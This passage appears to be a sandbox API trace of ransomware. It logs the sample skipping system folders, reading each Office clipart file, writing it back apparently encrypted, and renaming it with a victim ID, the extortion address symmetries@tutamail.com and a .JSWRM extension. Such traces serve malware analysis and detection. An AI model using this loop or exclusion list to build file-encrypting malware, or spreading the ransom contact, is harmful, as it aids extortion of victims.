[0092.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0092.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0092.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0092.540] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2fb8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02423_.WMF", cAlternateFileName="")) returned 1 [0092.540] lstrcmpiW (lpString1="NA02423_.WMF", lpString2=".") returned 1 [0092.540] lstrcmpiW (lpString1="NA02423_.WMF", lpString2="..") returned 1 [0092.540] lstrcmpiW (lpString1="NA02423_.WMF", lpString2="...") returned 1 [0092.540] lstrcmpiW (lpString1="NA02423_.WMF", lpString2="windows") returned -1 [0092.540] lstrcmpiW (lpString1="NA02423_.WMF", lpString2="recovery") returned -1 [0092.540] lstrcmpiW (lpString1="NA02423_.WMF", lpString2="perflogs") returned -1 [0092.540] lstrcmpiW (lpString1="NA02423_.WMF", lpString2="documents and settings") returned 1 [0092.540] lstrcmpiW (lpString1="NA02423_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.540] lstrcmpiW (lpString1="NA02423_.WMF", lpString2="system volume information") returned -1 [0092.540] lstrcmpiW (lpString1="NA02423_.WMF", lpString2="msocache") returned 1 [0092.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02423_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02423_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02423_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02423_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02423_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02423_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0092.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02423_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02423_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.542] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12216) returned 1 [0092.542] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2fb0) returned 0x24d210 [0092.542] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2fb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2fb0, lpOverlapped=0x0) returned 1 [0092.545] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.545] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2fb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2fb0, lpOverlapped=0x0) returned 1 [0092.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.545] CloseHandle (hObject=0x314) returned 1 [0092.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0092.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0092.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0092.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0092.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0092.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0092.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.546] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02423_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02423_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02423_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02423_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0092.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0092.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0092.546] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x53c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02424_.WMF", cAlternateFileName="")) returned 1 [0092.547] lstrcmpiW (lpString1="NA02424_.WMF", lpString2=".") returned 1 [0092.547] lstrcmpiW (lpString1="NA02424_.WMF", lpString2="..") returned 1 [0092.547] lstrcmpiW (lpString1="NA02424_.WMF", lpString2="...") returned 1 [0092.547] lstrcmpiW (lpString1="NA02424_.WMF", lpString2="windows") returned -1 [0092.547] lstrcmpiW (lpString1="NA02424_.WMF", lpString2="recovery") returned -1 [0092.547] lstrcmpiW (lpString1="NA02424_.WMF", lpString2="perflogs") returned -1 [0092.547] lstrcmpiW (lpString1="NA02424_.WMF", lpString2="documents and settings") returned 1 [0092.547] lstrcmpiW (lpString1="NA02424_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.547] lstrcmpiW (lpString1="NA02424_.WMF", lpString2="system volume information") returned -1 [0092.547] lstrcmpiW (lpString1="NA02424_.WMF", lpString2="msocache") returned 1 [0092.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0092.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02424_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02424_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02424_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0092.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0092.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02424_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02424_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02424_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0092.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0092.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02424_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02424_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.548] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1340) returned 1 [0092.548] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x530) returned 0x21af28 [0092.548] ReadFile (in: hFile=0x314, lpBuffer=0x21af28, nNumberOfBytesToRead=0x530, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x21af28*, lpNumberOfBytesRead=0x345e89c*=0x530, lpOverlapped=0x0) returned 1 [0092.556] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.556] WriteFile (in: hFile=0x314, lpBuffer=0x21af28*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x21af28*, lpNumberOfBytesWritten=0x345e898*=0x530, lpOverlapped=0x0) returned 1 [0092.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 [0092.556] CloseHandle (hObject=0x314) returned 1 [0092.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0092.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0092.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0092.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0092.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0092.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0092.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.556] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02424_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02424_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02424_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02424_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0092.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0092.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0092.557] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1948, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02426_.WMF", cAlternateFileName="")) returned 1 [0092.557] lstrcmpiW (lpString1="NA02426_.WMF", lpString2=".") returned 1 [0092.557] lstrcmpiW (lpString1="NA02426_.WMF", lpString2="..") returned 1 [0092.557] lstrcmpiW (lpString1="NA02426_.WMF", lpString2="...") returned 1 [0092.557] lstrcmpiW (lpString1="NA02426_.WMF", lpString2="windows") returned -1 [0092.557] lstrcmpiW (lpString1="NA02426_.WMF", lpString2="recovery") returned -1 [0092.558] lstrcmpiW (lpString1="NA02426_.WMF", lpString2="perflogs") returned -1 [0092.558] lstrcmpiW (lpString1="NA02426_.WMF", lpString2="documents and settings") returned 1 [0092.558] lstrcmpiW (lpString1="NA02426_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.558] lstrcmpiW (lpString1="NA02426_.WMF", lpString2="system volume information") returned -1 [0092.558] lstrcmpiW (lpString1="NA02426_.WMF", lpString2="msocache") returned 1 [0092.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0092.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02426_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02426_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02426_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0092.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02426_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02426_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02426_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0092.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02426_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02426_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.559] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6472) returned 1 [0092.559] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1940) returned 0x205850 [0092.559] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1940, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1940, lpOverlapped=0x0) returned 1 [0092.561] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.561] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1940, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1940, lpOverlapped=0x0) returned 1 [0092.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.561] CloseHandle (hObject=0x314) returned 1 [0092.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0092.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0092.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0092.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0092.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0092.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0092.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.561] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02426_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02426_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02426_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02426_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0092.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0092.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.566] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c2c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02431_.WMF", cAlternateFileName="")) returned 1 [0092.566] lstrcmpiW (lpString1="NA02431_.WMF", lpString2=".") returned 1 [0092.566] lstrcmpiW (lpString1="NA02431_.WMF", lpString2="..") returned 1 [0092.566] lstrcmpiW (lpString1="NA02431_.WMF", lpString2="...") returned 1 [0092.566] lstrcmpiW (lpString1="NA02431_.WMF", lpString2="windows") returned -1 [0092.566] lstrcmpiW (lpString1="NA02431_.WMF", lpString2="recovery") returned -1 [0092.566] lstrcmpiW (lpString1="NA02431_.WMF", lpString2="perflogs") returned -1 [0092.566] lstrcmpiW (lpString1="NA02431_.WMF", lpString2="documents and settings") returned 1 [0092.566] lstrcmpiW (lpString1="NA02431_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.566] lstrcmpiW (lpString1="NA02431_.WMF", lpString2="system volume information") returned -1 [0092.566] lstrcmpiW (lpString1="NA02431_.WMF", lpString2="msocache") returned 1 [0092.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02431_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.566] WideCharToMultiByte (in: CodePage=0xfde9, 